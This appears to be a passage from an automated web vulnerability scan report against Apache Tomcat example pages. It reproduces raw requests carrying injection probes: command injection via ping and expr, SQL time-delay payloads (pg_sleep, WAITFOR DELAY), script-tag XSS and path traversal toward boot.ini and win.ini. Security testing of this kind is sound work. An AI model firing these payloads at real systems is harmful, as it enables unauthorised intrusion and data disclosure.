Response…d></tr></table></div> <p>On a server where <code>/etc/passwd</code> is not in use, you can request Catalina to consider all directories found in a specified base directory (such as<code>c:\Homes</code> in this example) to be considered "user home" directories for the purposes of this directive:</p><div align="left"><table border="0" cellpadding="0"cellspacing="4"><tr><td height="1" wi…ight="1" bgcolor="#ffffff"><pre><Host name="localhost" ...> ... <Listener className="org.apache.catalina.startup.UserConfig" directoryName="public_html" homeBase=c:\Homes"userClass="org.apache.catalina.startup.HomesUserDatabase"/> ...</Host></pre></td><td width="1" bgcolor="#023264"><img border="0" hspace="0" vspace="0" height="1" width="1"a…
17.6. /examples/servlets/servlet/CookieExamplehttp://161.74.91.78:8080/examples/servlets/servlet/CookieExample
Identified Internal Path(s)c:\windows\win.ini=3
Certainty
RequestPOST /examples/servlets/servlet/CookieExample HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/servlets/servlet/CookieExampleAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: '=3; NS1NO=3; Smith="&ping -c 26 127.0.0.1 &"; %27=3; '"--></style></script><script>netsparker(0x000964)</script>=3; ../../../../../../../../../../boot.ini=3;..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini=3; /../../../../../../../../../../boot.ini=3; file:/windows/win.ini=3; ../../../../../../../../../../windows/win.ini=3;$Version=1; Smith="1));SELECT pg_sleep(25)--"; JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; COOKIE_SUPPORT=trueAccept-Encoding: gzip, deflateContent-Length: 49Content-Type: application/x-www-form-urlencoded
cookiename=c%3a%5cwindows%5cwin.ini&cookievalue=3
ResponseHTTP/1.1 200 OKDate: Fri, 25 Jan 2013 09:13:44 GMTServer: Apache-Coyote/1.1Set-Cookie: c:\windows\win.ini=3Content-Length: 1643Content-Type: text/html
<html><body bgcolor="white"><head><title>Cookies Example</title></head><body><a href="../cookies.html"><img src="../images/code.gif" height=24 width=24 align=right border=0 alt="view code"></a><a href="../index.html"><img src="../images/return.gif" height=24 width=24 align=right border=0 alt="return"></a><h3>Cookies Example</h3>Your browser is sending the following cookies:<br>Cookie Name: '<br> Cookie Value: 3<br><br>Cookie Name: NS1NO<br> Cookie Value: 3<br><br>Cookie Name: Smith<br> Cookie Value: &ping -c 26 127.0.0.1 &<br><br>Cookie Name: %27<br> Cookie Value: 3<br><br>Cookie Name: '<br> Cookie Value: <br><br>Cookie Name: ../../../../../../../../../../boot.ini<br> Cookie Value: 3<br><br>Cookie Name: ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini<br> Cookie Value: 3<br><br>Cookie Name: /../../../../../../../../../../boot.ini<br> Cookie Value: 3<br><br>Cookie Name: file<br> Cookie Value: <br><br>Cookie Name: ../../../../../../../../../../windows/win.ini<br> Cookie Value: 3<br><br>Cookie Name: Smith<br> Cookie Value: 1));SELECT pg_sleep(25)--<br><br>Cookie Name: JSESSIONID<br> Cookie Value: 8CFCC592DC40DA02412C5EFC1A18A784<br><br>Cookie Name: COOKIE_SUPPORT<br> Cookie Value: true<br><br><P>You just sent the following cookie to your browser:<br>Name: c:\windows\win.ini<br>Value: 3<P>Create a cookie to send to your browser<br><form action="CookieExample" method=POST>Name: <input type=text length=20 name=cookiename><br>Value: <input type=text length=20 name=cookievalue><br><input type=submit></form></body></html>
17.7. /examples/jsp/sessions/carts.jsphttp://161.74.91.78:8080/examples/jsp/sessions/carts.jsp?item=Beavis+%26+Butt-head+Video+collection%..
34 / 35
Identified Internal Path(s)c:\windows\win.ini
Certainty
RequestGET /examples/jsp/sessions/carts.jsp?item=Beavis+%26+Butt-head+Video+collection%0a&submit=%22%26expr%20268409241%20-%202%20%26%22 HTTP/1.1Cache-Control: no-cacheReferer: http://161.74.91.78:8080/examples/jsp/sessions/carts.htmlAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)Accept-Language: en-us,en;q=0.5Host: 161.74.91.78:8080Cookie: JSESSIONID=8CFCC592DC40DA02412C5EFC1A18A784; GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=trueAccept-Encoding: gzip, deflate
Response…(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- <li> ns:netsparker056650=vuln <li> response.write(268409241-22)' <li>../../../../../../../../../../windows/win.ini.jsp <li> c:\windows\win.ini </ol></FONT><hr><html><!-- Licensed to the Apache Software Foundation (ASF) under one or more contributorlicense agreements. See the NOTICE file distributed with this work for addition…
35 / 35